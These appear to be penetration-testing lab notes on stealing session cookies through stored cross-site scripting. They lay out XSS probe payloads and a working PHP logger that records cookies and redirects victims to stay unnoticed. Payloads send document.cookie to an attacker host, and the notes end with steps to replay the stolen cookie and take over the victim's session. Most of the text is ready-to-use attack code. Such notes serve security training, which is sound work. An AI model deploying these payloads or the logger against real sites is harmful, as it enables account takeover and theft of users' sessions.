OBTAINING SESSION COOKIES (PHP SERVER)
log.php listens for any request of the form ?c=<document.cookie>; the payload injected into the target page appends the victim's document.cookie to that parameter, and the script writes whatever it receives to cookieLog.txt.
#discovery
root@oco:~$ BROWSER > {targetSite:port}
input field 1: "><img src=x onerror=prompt(document.domain)>
input field 2: "><img src=x onerror=confirm(1)>
input field 3: "><img src=x onerror=alert(1)>
* this identifies which input field is vulnerable to XSS (and which payload renders)
* document.domain is used to confirm that the JavaScript executes in the origin of the
  target page and not in a sandboxed frame/environment
  - JavaScript executing in a sandboxed environment blocks most client-side
    attacks, although sandbox escapes do exist
* if no automatic trigger occurs, use the site/page button (submit, save, preview, etc.) to trigger the payload
#check that HttpOnly is "off" using Web Developer Tools (if HttpOnly were set, document.cookie would not expose the session cookie and this technique would fail)
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
HttpOnly: False
Secure: False
SameSite: None
root@oco:~$ nano log.php
<?php
// append whatever arrives in the "c" parameter to cookieLog.txt, then redirect the victim
$logFile = "cookieLog.txt";
$cookie = $_REQUEST["c"] ?? "";          // "?? ''" avoids a notice when "c" is absent (PHP 7+)
if ($cookie !== "") {
    $handle = fopen($logFile, "a");
    fwrite($handle, $cookie . "\n\n");
    fclose($handle);
}
// send the victim on to a harmless page so the callback is less conspicuous
header("Location: http://www.google.com/");
exit;
?>
root@oco:~$ php -S <VPN/TUN Adapter IP>:8000
[Mon Mar 7 10:54:04 2022] PHP 7.4.21 Development Server (http://<VPN/TUN Adapter IP>:8000) started
* a bare PHP development server (such as this) or a Netcat listener speaks plain HTTP only; when the
  target application is served over HTTPS the browser may block or upgrade the plain-http callback
  (mixed content), so the cookie never arrives
  - in real-world engagements use an HTTPS-capable out-of-band service instead:
  - XSSHunter, Burp Collaborator or Project Interactsh
root@oco:~$ BROWSER > {targetSite:port}
vulnerable xss input field: <style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
* another sample payload: <h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
  - note this variant sends the cookie base64-encoded in a parameter named "cookie" to "/", not in "c" to "/log.php"; adjust either the payload or log.php, and base64-decode the logged value
#expected victim actions
root@target:~$ BROWSER > New Private Window > {targetSite:port}
* log in to the application
root@target:~$ BROWSER > http://xss.htb.net/profile?email=ela.stienen@example.com
* view the public profile
- this is the attacker-crafted public profile that hosts our cookie-stealing payload
root@oco:~$ phpServer...
[Sat Mar 12 22:37:30 2022] 10.10.14.36:37104 [302]: GET /log.php?c=auth-session=s%3AQZOROUpdXh...
root@oco:~$ cat cookieLog.txt
auth-session=s%3AQZOROUpdXh...
root@oco:~$ BROWSER > New Private Window > {targetSite:port} > F12 > Storage > Cookies > {targetFQDN}
Name: {auth-session}
Value: {cookieValue}
* set the stolen name/value pair in the cookie store, then refresh the target page; the application now treats the browser as the victim's authenticated session